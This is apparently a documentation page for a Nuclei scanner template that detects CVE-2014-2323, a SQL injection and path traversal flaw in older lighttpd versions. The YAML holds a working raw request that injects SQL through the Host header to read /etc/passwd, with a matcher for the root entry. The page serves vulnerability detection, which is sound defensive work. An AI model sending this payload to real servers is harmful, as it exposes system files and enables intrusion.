Skip to content
Nuclei Templates

Lighttpd 1.4.34 SQL Injection and Path Traversal

ID: CVE-2014-2323

Severity: critical

Author: geeknik

Tags: cve2014,cve,lighttpd,injection,seclists,sqli

Description

Section titled “Description”

A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).

YAML Source

Section titled “YAML Source”
id: CVE-2014-2323


info:
  name: Lighttpd 1.4.34 SQL Injection and Path Traversal
  author: geeknik
  severity: critical
  description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).
  impact: |
    Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution
  remediation: |
    Upgrade to a patched version of Lighttpd or apply the necessary security patches
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2014-2323
    - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
    - http://www.lighttpd.net/2014/3/12/1.4.35/
    - http://seclists.org/oss-sec/2014/q1/561
    - http://jvn.jp/en/jp/JVN37417423/index.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-2323
    cwe-id: CWE-89
    epss-score: 0.96033
    epss-percentile: 0.99481
    cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: lighttpd
    product: lighttpd
    shodan-query: cpe:"cpe:2.3:a:lighttpd:lighttpd"
  tags: cve2014,cve,lighttpd,injection,seclists,sqli


http:
  - raw:
      - |+
        GET /etc/passwd HTTP/1.1
        Host: [::1]' UNION SELECT '/


    unsafe: true
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"
# digest: 4a0a0047304502207d36bc9d2142977c31d810cd0787f2c769d910748898e362a9bfdbc7fdeb8c60022100d5cb4f985a7b8c9fb7a3649fe0f3cdf713f255fb35132121150c0446f76f4d8b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2014/CVE-2014-2323.yaml"

View on Github